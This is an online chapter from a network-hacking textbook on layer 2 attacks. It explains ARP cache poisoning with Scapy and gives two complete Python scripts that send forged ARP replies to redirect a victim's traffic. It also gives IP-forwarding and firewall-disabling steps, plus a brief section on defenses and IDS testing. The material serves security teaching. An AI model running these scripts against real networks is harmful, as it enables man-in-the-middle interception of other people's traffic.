Log in / Register
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

Chapter 4 Layer 2 Attacks

Abstract We introduce our tour into the wonderful world of network hacking with an ambitious chapter about layer 2 attacks. Let us recall layer 2 (see Sect. 2.4) is responsible for addressing packets in an Ethernet with the use of MAC addresses. Beside ARP attacks we will investigate how switches react on DOS attacks and how one can escape out of a VLAN environment.

4.1 Required Modules

In Python you don't have to care about raw sockets or network byte ordering, thus thanks to Scapy programmed by Philippe Biondi Python has the world's best packet generator that is even easy to use. Neither pointer arithmetic is needed like in Libnet and C nor are you limited in a few protocols like in RawIP and Perl or with Scruby and Ruby. Scapy can construct packets on all OSI layers from ARP over IP/ICMP to TCP/UDP and DNS/DHCP etc. even more unusual protocols are supported like BOOTP, GPRS, PPPoE, SNMP, Radius, Infrared, L2CAP/HCI, EAP. You will learn more about it in Sect. 5.13.1.

Now let us use Scapy to make some trouble on layer 2! First of all you need to install it with the following magic line:

pip install Scapy

And there you go with one of the famous classics of man in the middle attacks!

4.2 ARP-Cache-Poisoning

The functionality of the protocol ARP (Address Resolution Protocol) was described in Sect. 2.6. A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself. This works because most operating systems accept response packets to questions they never asked!

1 #!/usr/bin/python


3 import sys

4 import time

5 from scapy.all import sendp, ARP, Ether


7 if len(sys.argv) < 3:

8 print sys.argv[0] + ": <target> <spoof_ip>"

9 sys.exit(1)


11 iface = "eth0"

12 target_ip = sys.argv[1]

13 fake_ip = sys.argv[2]


15 ethernet = Ether()

16 arp = ARP(pdst=target_ip,

17 psrc=fake_ip,

18 op="is-at")

19 packet = ethernet / arp


21 while True:

22 sendp(packet, iface=iface)

23 time.sleep(10)

With the help of Scapy we construct a packet called packet consisting of an Ethernet() and an ARP() header. In the ARP header we set the IP address of the victim (target_ip) and the IP which we would like to hijack all connections (fake_ip). As last parameter we define the OP-Code is-at, that declares the packet as an ARP response. Afterwards the function sendp() sends the packet in an endless loop waiting 10 s between each delivery.

Its important to note that you have to call the function sendp() and not the function send(), because the packet should be sent on layer 2. The function send() sends packets on layer 3.

One last thing to remember is to enable IP forwarding otherwise your host would block the connection of the victim.

sysctl net.ipv4.ip_forward=1

Don't forget to check the settings of your packet filter like IPtables, pf or ipfw or just disable it, but now enough about the boring theory lets jump into some practical Python code!

If you only manipulate the ARP cache of the client with the fake_ip you only get the packets of the client, but the responses of the server will stay invisible. Figure 4.1 illustrates that case.

Fig. 4.1 One-way-man-in-the-middle

Fig. 4.2 Bidirectional man-in-the-middle

To enforce a bidirectional connection through the computer of the attacker like in Fig. 4.2 the attacker has to forge both the client and the server with his own MAC for the relevant destination.

Our first code is a bit graceless and sends a lot of ARP packets. It doesn't only generate more traffic as needed it's also conspicuous. Stealthy attackers would use another tactic.

A computer that wants to get knowledge about an IP address asks with an ARP request. We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request. In a switched environment this will result in every connection flowing over the computer of the attacker, because in every ARP cache there will be the attackers MAC for every IP address. This solution is more elegant and not as noisy as the one before, but still quite easy to detected for a trained admin.

The spoofed response packet gets sent in parallel to the response of the real host as illustrated in Fig. 4.3. The computer whose packet receives first at the victims network card wins.

1 #!/usr/bin/python


3 import sys

4 from scapy.all import sniff, sendp, ARP, Ether



7 if len(sys.argv) < 2:

8 print sys.argv[0] + " <iface>"

Fig. 4.3 ARP-spoofing

9 sys.exit(0)



12 def arp_poison_callback(packet):

13 # Got ARP request?

14 if packet[ARP].op == 1:

15 answer = Ether(dst=packet[ARP].hwsrc) / ARP()

16 answer[ARP].op = "is-at"

17 answer[ARP].hwdst = packet[ARP].hwsrc

18 answer[ARP].psrc = packet[ARP].pdst

19 answer[ARP].pdst = packet[ARP].psrc


21 print "Fooling " + packet[ARP].psrc + " that " +

22 packet[ARP].pdst + " is me"


24 sendp(answer, iface=sys.argv[1])


26 sniff(prn=arp_poison_callback,

27 filter="arp",

28 iface=sys.argv[1],

29 store=0)

The function sniff() reads packets in an endless loop from the interface specified by the parameter iface. The received packets are automatically filtered by the PCAP filter arp that guarantees that our callback function arp_poison_callback will only get called with ARP packets as input. Due to the parameter store=0 the packet will only be saved in memory but not on the hard disk.

The function arp_poison_callback() handles the real work of our program. First of all it checks the OP code of the ARP packet: when it's 1 the packet is an ARP request and we generate a response packet, that has the source MAC and IP of the request packet as destination MAC and IP. We don't define a source MAC thus Scapy automatically insert the addresses of the sending network interface.

The IP to MAC resolution of ARP will get cached for some time, because it would be dump to ask for the resolution of the same address over and over again. This ARP cache can be displayed with the following command.

arp -an

? ( at c0:de:de:ad:be:ef [ether] on eth0

It depends on the operating system, its version and local configuration settings on how long addresses will get cached.

To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher (see Sect. 4.3). ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the functionality of your IDS by using the above scripts to see how it behaves.

Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
Business & Finance
Computer Science
Language & Literature
Political science